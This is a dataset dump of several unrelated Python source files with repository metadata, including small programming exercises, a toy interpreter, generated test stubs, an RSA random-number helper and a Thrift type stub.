54b2f75b9c95fad2376fd7e521729582e3913dbc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03729/s693243287.py | 3d79cef6c484c819706127a9b7d9fd8131e45a28 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | A = list(map(str,input().rstrip().split(" ")))
if(A[0][-1] == A[1][0] and A[1][-1] == A[2][0]):print("YES")
else: print("NO") | [
"[email protected]"
] | |
9fbb8d857ef7cc14b89be917d6cb223e5b2d5dc8 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /5FoNY2Z7B5wSCDTA4_0.py | fc139177107dd49dad4a420b77ec06ab6021e1c7 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 484 | py | """
**Mubashir** needs your help to find out next happy year.
A **Happy Year** is the year with only _distinct digits_. Create a function
that takes an integer `year` and returns the **next happy year**.
### Examples
happy_year(2017) ➞ 2018
# 2018 has all distinct digits
happy_year(1990) ➞ 2013
happy_year(2021) ➞ 2031
### Notes
N/A
"""
def happy_year(year):
year += 1
  while len(set(str(year))) != 4: year += 1
return year
| [
"[email protected]"
] | |
f19b981590955f36e941e7afe7fc8e93e62b4691 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/6/o-6.py | 1716de51f5f78c365bfd3307c53c770d5dfa8d65 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'o-6':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
6bfec8c1fcbb786162593abf6d669f571b7c851e | 275a96a33ae1f89e7b2ee0ecdbac7d78abe6d6cc | /test/test_user_with_balance_result.py | 72c8b77ba889ac3b0da96b18a24fc46de2b8a7de | [] | no_license | cascadiarc/cyclos-python-client | 8029ce07174f2fe92350a92dda9a60976b2bb6c2 | a2e22a30e22944587293d51be2b8268bce808d70 | refs/heads/main | 2023-04-03T16:52:01.618444 | 2021-04-04T00:00:52 | 2021-04-04T00:00:52 | 354,419,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py | # coding: utf-8
"""
Cyclos 4.11.5 API
The REST API for Cyclos 4.11.5 # noqa: E501
OpenAPI spec version: 4.11.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.user_with_balance_result import UserWithBalanceResult # noqa: E501
from swagger_client.rest import ApiException
class TestUserWithBalanceResult(unittest.TestCase):
"""UserWithBalanceResult unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testUserWithBalanceResult(self):
"""Test UserWithBalanceResult"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.user_with_balance_result.UserWithBalanceResult() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
6ac2e4e4004008a5b2623b6c78287deb51703b8f | bbeba16730eca05a897e46e771b8e9dc2a61e044 | /testflows/_core/contrib/rsa/randnum.py | aad03fac065e68575ca88525fb786438bdd31ccc | [
"Apache-2.0"
] | permissive | testflows/TestFlows-Core | 47d3e5b8890fcf73024c91f4ea293363c29f422b | 7dd2d3af19f6930257bd53133286edb78bf490ab | refs/heads/master | 2023-08-16T15:42:08.888323 | 2023-08-15T11:35:09 | 2023-08-15T11:35:09 | 215,418,320 | 5 | 4 | NOASSERTION | 2023-04-26T19:28:55 | 2019-10-15T23:59:26 | Python | UTF-8 | Python | false | false | 2,695 | py | # Copyright 2011 Sybren A. Stüvel <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for generating random numbers."""
# Source inspired by code by Yesudeep Mangalapilly <[email protected]>
import os
import struct
from .common import bit_size as get_bit_size
from .transform import bytes2int
def read_random_bits(nbits: int) -> bytes:
"""Reads 'nbits' random bits.
If nbits isn't a whole number of bytes, an extra byte will be appended with
only the lower bits set.
"""
nbytes, rbits = divmod(nbits, 8)
# Get the random bytes
randomdata = os.urandom(nbytes)
# Add the remaining random bits
if rbits > 0:
randomvalue = ord(os.urandom(1))
randomvalue >>= (8 - rbits)
randomdata = struct.pack("B", randomvalue) + randomdata
return randomdata
def read_random_int(nbits: int) -> int:
"""Reads a random integer of approximately nbits bits.
"""
randomdata = read_random_bits(nbits)
value = bytes2int(randomdata)
# Ensure that the number is large enough to just fill out the required
# number of bits.
value |= 1 << (nbits - 1)
return value
def read_random_odd_int(nbits: int) -> int:
"""Reads a random odd integer of approximately nbits bits.
>>> read_random_odd_int(512) & 1
1
"""
value = read_random_int(nbits)
# Make sure it's odd
return value | 1
def randint(maxvalue: int) -> int:
"""Returns a random integer x with 1 <= x <= maxvalue
May take a very long time in specific situations. If maxvalue needs N bits
to store, the closer maxvalue is to (2 ** N) - 1, the faster this function
is.
"""
bit_size = get_bit_size(maxvalue)
tries = 0
while True:
value = read_random_int(bit_size)
if value <= maxvalue:
break
if tries % 10 == 0 and tries:
# After a lot of tries to get the right number of bits but still
# smaller than maxvalue, decrease the number of bits by 1. That'll
# dramatically increase the chances to get a large enough number.
bit_size -= 1
tries += 1
return value
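# ----------------------------------------------------------------------
# Hedged usage sketch (illustration only): quick properties of the helpers
# above; the drawn values themselves are random by construction.
if __name__ == '__main__':
    assert len(read_random_bits(12)) == 2      # one full byte plus a 4-bit byte
    assert read_random_odd_int(64) % 2 == 1    # lowest bit is forced on
    assert 1 <= randint(10 ** 6) <= 10 ** 6    # bounded draw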
| [
"[email protected]"
] | |
32efb664104158f736b734dd02cffd81d7c62d5f | 8cfdba6dd2804e2c3e3faed0c47640f347b14414 | /utils/util.py | 4bca3bba741b252dee48d19f96f64b8b9842e9ac | [] | no_license | DiegoDigo/tochegando | 07c4368842897d80df57545a93bf182203724b04 | 36ac3b7109a60a4998b283c54d85d80b8c8e535e | refs/heads/master | 2023-05-28T08:49:43.564907 | 2017-11-27T19:28:06 | 2017-11-27T19:28:06 | 108,421,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | from datetime import datetime
def verificar_idade(datanasc: datetime):
    hoje = datetime.today()
    # subtract one year when this year's birthday has not happened yet
    if (hoje.month, hoje.day) < (datanasc.month, datanasc.day):
        return hoje.year - datanasc.year - 1
    else:
        return hoje.year - datanasc.year
| [
"[email protected]"
] | |
e0532dcd7c140dfcde74fa62db1322d31eff3488 | 2f1a092537d8650cacbd274a3bd600e87a627e90 | /thrift/compiler/test/fixtures/pyi/gen-py/simple/example_asyncio/ttypes.pyi | d1f0a742d882edc21258502a70bc4aa3634383af | [
"Apache-2.0"
] | permissive | ConnectionMaster/fbthrift | 3aa7d095c00b04030fddbabffbf09a5adca29d42 | d5d0fa3f72ee0eb4c7b955e9e04a25052678d740 | refs/heads/master | 2023-04-10T17:49:05.409858 | 2021-08-03T02:32:49 | 2021-08-03T02:33:57 | 187,603,239 | 1 | 1 | Apache-2.0 | 2023-04-03T23:15:28 | 2019-05-20T08:49:29 | C++ | UTF-8 | Python | false | false | 10,443 | pyi | #
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
# @generated
#
# pyre-unsafe
import typing as __T # sometimes `t` is used as a field name
from thrift import Thrift
from thrift.protocol.TProtocol import TProtocolBase
__property__ = property # sometimes `property` is used as a field name
import simple.dependent_asyncio.ttypes
UTF8STRINGS: bool
class AnEnum(int):
ONE: __T.ClassVar[AnEnum]
TWO: __T.ClassVar[AnEnum]
THREE: __T.ClassVar[AnEnum]
FOUR: __T.ClassVar[AnEnum]
_VALUES_TO_NAMES: __T.ClassVar[__T.Dict[AnEnum, str]]
_NAMES_TO_VALUES: __T.ClassVar[__T.Dict[str, AnEnum]]
class SimpleException(Thrift.TException):
thrift_spec: __T.Tuple[__T.Optional[__T.Tuple[int, int, str, __T.Any, __T.Optional[int], int]]]
thrift_field_annotations: __T.Dict[int, __T.Dict[str, str]]
thrift_struct_annotations: __T.Dict[str, str]
def __init__(
self,
err_code: __T.Optional[int] = ...
) -> None:
...
@__property__
def err_code(self) -> int: ...
@err_code.setter
def err_code(self, value: __T.Optional[int]) -> None: ...
def isUnion(self) -> bool: ...
def checkRequired(self) -> None: ...
def read(self, iprot: TProtocolBase) -> None: ...
@__T.overload
def readFromJson(self, json: __T.Dict[str, __T.Any], is_text: bool = ..., **kwargs: __T.Any) -> None: ...
@__T.overload
def readFromJson(self, json: str, is_text: bool = ..., **kwargs: __T.Any) -> None: ...
def write(self, oprot: TProtocolBase) -> None: ...
def __eq__(self, other: __T.Any) -> bool: ...
def __ne__(self, other: __T.Any) -> bool: ...
class MessageException(Thrift.TException):
thrift_spec: __T.Tuple[__T.Optional[__T.Tuple[int, int, str, __T.Any, __T.Optional[int], int]]]
thrift_field_annotations: __T.Dict[int, __T.Dict[str, str]]
thrift_struct_annotations: __T.Dict[str, str]
def __init__(
self,
message: __T.Optional[str] = ...,
err_code: __T.Optional[int] = ...
) -> None:
...
@__property__
def message(self) -> str: ...
@message.setter
def message(self, value: __T.Optional[str]) -> None: ...
@__property__
def err_code(self) -> int: ...
@err_code.setter
def err_code(self, value: __T.Optional[int]) -> None: ...
def isUnion(self) -> bool: ...
def checkRequired(self) -> None: ...
def read(self, iprot: TProtocolBase) -> None: ...
@__T.overload
def readFromJson(self, json: __T.Dict[str, __T.Any], is_text: bool = ..., **kwargs: __T.Any) -> None: ...
@__T.overload
def readFromJson(self, json: str, is_text: bool = ..., **kwargs: __T.Any) -> None: ...
def write(self, oprot: TProtocolBase) -> None: ...
def __eq__(self, other: __T.Any) -> bool: ...
def __ne__(self, other: __T.Any) -> bool: ...
class SimpleStruct:
thrift_spec: __T.Tuple[__T.Optional[__T.Tuple[int, int, str, __T.Any, __T.Optional[int], int]]]
thrift_field_annotations: __T.Dict[int, __T.Dict[str, str]]
thrift_struct_annotations: __T.Dict[str, str]
def __init__(
self,
is_on: __T.Optional[bool] = ...,
tiny_int: int = ...,
small_int: __T.Optional[int] = ...,
nice_sized_int: __T.Optional[int] = ...,
big_int: __T.Optional[int] = ...,
coarse_real: float = ...,
precise_real: __T.Optional[float] = ...,
a_str: __T.Optional[str] = ...,
a_bytes: __T.Optional[bytes] = ...
) -> None:
...
@__property__
def is_on(self) -> bool: ...
@is_on.setter
def is_on(self, value: __T.Optional[bool]) -> None: ...
@__property__
def tiny_int(self) -> int: ...
@tiny_int.setter
def tiny_int(self, value: int) -> None: ...
@__property__
def small_int(self) -> __T.Optional[int]: ...
@small_int.setter
def small_int(self, value: __T.Optional[int]) -> None: ...
@__property__
def nice_sized_int(self) -> __T.Optional[int]: ...
@nice_sized_int.setter
def nice_sized_int(self, value: __T.Optional[int]) -> None: ...
@__property__
def big_int(self) -> int: ...
@big_int.setter
def big_int(self, value: __T.Optional[int]) -> None: ...
@__property__
def coarse_real(self) -> float: ...
@coarse_real.setter
def coarse_real(self, value: float) -> None: ...
@__property__
def precise_real(self) -> float: ...
@precise_real.setter
def precise_real(self, value: __T.Optional[float]) -> None: ...
@__property__
def a_str(self) -> str: ...
@a_str.setter
def a_str(self, value: __T.Optional[str]) -> None: ...
@__property__
def a_bytes(self) -> __T.Optional[bytes]: ...
@a_bytes.setter
def a_bytes(self, value: __T.Optional[bytes]) -> None: ...
def isUnion(self) -> bool: ...
def checkRequired(self) -> None: ...
def read(self, iprot: TProtocolBase) -> None: ...
@__T.overload
def readFromJson(self, json: __T.Dict[str, __T.Any], is_text: bool = ..., **kwargs: __T.Any) -> None: ...
@__T.overload
def readFromJson(self, json: str, is_text: bool = ..., **kwargs: __T.Any) -> None: ...
def write(self, oprot: TProtocolBase) -> None: ...
def __eq__(self, other: __T.Any) -> bool: ...
def __ne__(self, other: __T.Any) -> bool: ...
class ComplexStruct:
thrift_spec: __T.Tuple[__T.Optional[__T.Tuple[int, int, str, __T.Any, __T.Optional[int], int]]]
thrift_field_annotations: __T.Dict[int, __T.Dict[str, str]]
thrift_struct_annotations: __T.Dict[str, str]
def __init__(
self,
structOne: __T.Optional[SimpleStruct] = ...,
structTwo: __T.Optional[SimpleStruct] = ...,
an_integer: __T.Optional[int] = ...,
name: __T.Optional[str] = ...,
an_enum: __T.Optional[AnEnum] = ...,
values: __T.Optional[__T.List[int]] = ...,
structs: __T.Optional[__T.List[SimpleStruct]] = ...,
amap: __T.Optional[__T.Dict[str, str]] = ...,
aset: __T.Optional[__T.Set[str]] = ...,
item: __T.Optional[simple.dependent_asyncio.ttypes.Item] = ...,
from_PY_RESERVED_KEYWORD: __T.Optional[int] = ...
) -> None:
...
@__property__
def structOne(self) -> SimpleStruct: ...
@structOne.setter
def structOne(self, value: __T.Optional[SimpleStruct]) -> None: ...
@__property__
def structTwo(self) -> __T.Optional[SimpleStruct]: ...
@structTwo.setter
def structTwo(self, value: __T.Optional[SimpleStruct]) -> None: ...
@__property__
def an_integer(self) -> int: ...
@an_integer.setter
def an_integer(self, value: __T.Optional[int]) -> None: ...
@__property__
def name(self) -> str: ...
@name.setter
def name(self, value: __T.Optional[str]) -> None: ...
@__property__
def an_enum(self) -> AnEnum: ...
@an_enum.setter
def an_enum(self, value: __T.Optional[AnEnum]) -> None: ...
@__property__
def values(self) -> __T.List[int]: ...
@values.setter
def values(self, value: __T.Optional[__T.List[int]]) -> None: ...
@__property__
def structs(self) -> __T.List[SimpleStruct]: ...
@structs.setter
def structs(self, value: __T.Optional[__T.List[SimpleStruct]]) -> None: ...
@__property__
def amap(self) -> __T.Dict[str, str]: ...
@amap.setter
def amap(self, value: __T.Optional[__T.Dict[str, str]]) -> None: ...
@__property__
def aset(self) -> __T.Set[str]: ...
@aset.setter
def aset(self, value: __T.Optional[__T.Set[str]]) -> None: ...
@__property__
def item(self) -> simple.dependent_asyncio.ttypes.Item: ...
@item.setter
def item(self, value: __T.Optional[simple.dependent_asyncio.ttypes.Item]) -> None: ...
@__property__
def from_PY_RESERVED_KEYWORD(self) -> int: ...
@from_PY_RESERVED_KEYWORD.setter
def from_PY_RESERVED_KEYWORD(self, value: __T.Optional[int]) -> None: ...
def isUnion(self) -> bool: ...
def checkRequired(self) -> None: ...
def read(self, iprot: TProtocolBase) -> None: ...
@__T.overload
def readFromJson(self, json: __T.Dict[str, __T.Any], is_text: bool = ..., **kwargs: __T.Any) -> None: ...
@__T.overload
def readFromJson(self, json: str, is_text: bool = ..., **kwargs: __T.Any) -> None: ...
def write(self, oprot: TProtocolBase) -> None: ...
def __eq__(self, other: __T.Any) -> bool: ...
def __ne__(self, other: __T.Any) -> bool: ...
class UnionStruct:
thrift_spec: __T.Tuple[__T.Optional[__T.Tuple[int, int, str, __T.Any, __T.Optional[int], int]]]
thrift_field_annotations: __T.Dict[int, __T.Dict[str, str]]
thrift_struct_annotations: __T.Dict[str, str]
def __init__(
self,
is_a_bool: __T.Optional[bool] = ...,
some_string_goes_here: __T.Optional[str] = ...,
perhaps_a_big_int: __T.Optional[int] = ...
) -> None:
...
@__property__
def is_a_bool(self) -> bool: ...
@is_a_bool.setter
def is_a_bool(self, value: __T.Optional[bool]) -> None: ...
@__property__
def some_string_goes_here(self) -> str: ...
@some_string_goes_here.setter
def some_string_goes_here(self, value: __T.Optional[str]) -> None: ...
@__property__
def perhaps_a_big_int(self) -> int: ...
@perhaps_a_big_int.setter
def perhaps_a_big_int(self, value: __T.Optional[int]) -> None: ...
def getType(self) -> int: ...
def get_is_a_bool(self) -> bool: ...
def set_is_a_bool(self, value: bool) -> None: ...
def get_some_string_goes_here(self) -> str: ...
def set_some_string_goes_here(self, value: str) -> None: ...
def get_perhaps_a_big_int(self) -> int: ...
def set_perhaps_a_big_int(self, value: int) -> None: ...
__EMPTY__: int = ...
IS_A_BOOL: int = ...
SOME_STRING_GOES_HERE: int = ...
PERHAPS_A_BIG_INT: int = ...
def isUnion(self) -> bool: ...
def checkRequired(self) -> None: ...
def read(self, iprot: TProtocolBase) -> None: ...
@__T.overload
def readFromJson(self, json: __T.Dict[str, __T.Any], is_text: bool = ..., **kwargs: __T.Any) -> None: ...
@__T.overload
def readFromJson(self, json: str, is_text: bool = ..., **kwargs: __T.Any) -> None: ...
def write(self, oprot: TProtocolBase) -> None: ...
def __eq__(self, other: __T.Any) -> bool: ...
def __ne__(self, other: __T.Any) -> bool: ...
ListOfSimpleStructs = __T.List[SimpleStruct]
| [
"[email protected]"
] |